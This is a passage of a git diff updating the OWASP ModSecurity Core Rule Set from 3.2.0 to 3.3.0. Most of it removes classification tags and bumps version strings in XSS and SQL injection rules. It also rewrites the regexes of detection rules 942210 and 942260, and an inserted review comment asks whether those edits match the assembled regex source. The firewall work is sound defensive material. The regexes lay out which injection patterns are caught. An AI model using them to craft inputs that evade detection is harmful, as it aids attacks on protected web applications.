 tag:'platform-multi',\
 tag:'attack-xss',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'WASCTC/WASC-8',\
- tag:'WASCTC/WASC-22',\
- tag:'OWASP_TOP_10/A2',\
- tag:'OWASP_AppSensor/IE1',\
 tag:'PCI/6.5.1',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -988,12 +823,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'language-multi',\
 tag:'attack-xss',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/XSS',\
- tag:'OWASP_TOP_10/A7',\
- tag:'CAPEC-63',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
index 504c826ce..5f93a8ce4 100644
--- a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+++ b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -56,12 +56,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -93,13 +89,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -124,8 +116,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -152,12 +143,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -184,12 +171,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -208,12 +191,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -232,12 +211,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -264,12 +239,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -288,12 +259,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -312,12 +279,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -344,12 +307,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -368,12 +327,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -400,12 +355,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -432,12 +383,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -475,12 +422,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -514,12 +457,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-sqli',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -554,13 +493,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$)" \
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'"
@@ -593,13 +528,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\)|\
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -631,13 +562,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?(?:
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
@@ -672,14 +599,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -705,13 +628,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -740,13 +659,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -762,7 +677,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # to the Regexp::Assemble output:
 # (?i:ASSEMBLE_OUTPUT)
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]|\/\w+;?\s+(?:between|having|select|like|x?or|and|div)\W|\d+\s*?(?:between|like|x?or|and|div)\s*?\d+\s*?[\-+]|--\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|#\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|;\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|\@.+=\s*?\(\s*?select|\d\s+group\s+by.+\(|[^\w]SET\s*?\@\w+))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]|\d(?:\s*?(?:between|like|x?or|and|div)\s*?\d+\s*?[\-+]|\s+group\s+by.+\()|\/\w+;?\s+(?:between|having|select|like|x?or|and|div)\W|--\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|#\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|;\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|\@.+=\s*?\(\s*?select|[^\w]SET\s*?\@\w+))" \
 "id:942210,\
 phase:2,\
 block,\
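Review bot: The new 942210 expression is hand-edited while the context lines directly above it state that the regex is Regexp::Assemble output, so unless the assemble source data was updated in the same commit the next regeneration will revert the `\d(?:\s*?(?:between|like|x?or|and|div)\s*?\d+\s*?[\-+]|\s+group\s+by.+\()` factoring; that file is not in this hunk, so please confirm it is in sync. The factoring reads as match-equivalent to the old separate `\d+\s*?...` and `\d\s+group\s+by.+\(` alternatives (only one leading digit is consumed, so the same inputs still match), but no regression-test change is visible, and a test that exercises each of the two factored alternatives against 942210 would pin that equivalence. The same applies to the `\w+\s+like\s+[\"'`]` → `\w\s+like\s+[\"'`]` edit in 942260 on the next hunk, whose header comment also says the regex is assembled output. The SecRule continues past the hunk: `block,\` is not the end of the action list.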
@@ -775,13 +690,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -794,7 +705,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # to the Regexp::Assemble output:
 # ASSEMBLE_OUTPUT | s/^(?:/(?i:/
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`]\s*?(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||and|div|&&)\s+[\s\w]+=\s*?\w+\s*?having\s+|like(?:\s+[\s\w]+=\s*?\w+\s*?having\s+|\W*?[\"'`\d])|[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w|\*\s*?\w+\W+[\"'`])|(?:union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select|select\s+?[\[\]()\s\w\.,\"'`-]+from)\s+|\w+\s+like\s+[\"'`]|find_in_set\s*?\(|like\s*?[\"'`]%)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`]\s*?(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||and|div|&&)\s+[\s\w]+=\s*?\w+\s*?having\s+|like(?:\s+[\s\w]+=\s*?\w+\s*?having\s+|\W*?[\"'`\d])|[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w|\*\s*?\w+\W+[\"'`])|(?:union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select|select\s+?[\[\]()\s\w\.,\"'`-]+from)\s+|\w\s+like\s+[\"'`]|find_in_set\s*?\(|like\s*?[\"'`]%)" \
 "id:942260,\
 phase:2,\
 block,\
@@ -807,13 +718,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -839,13 +746,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -871,13 +774,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -911,13 +810,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -945,13 +840,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -973,13 +864,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1010,13 +897,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1039,14 +922,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1069,14 +948,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
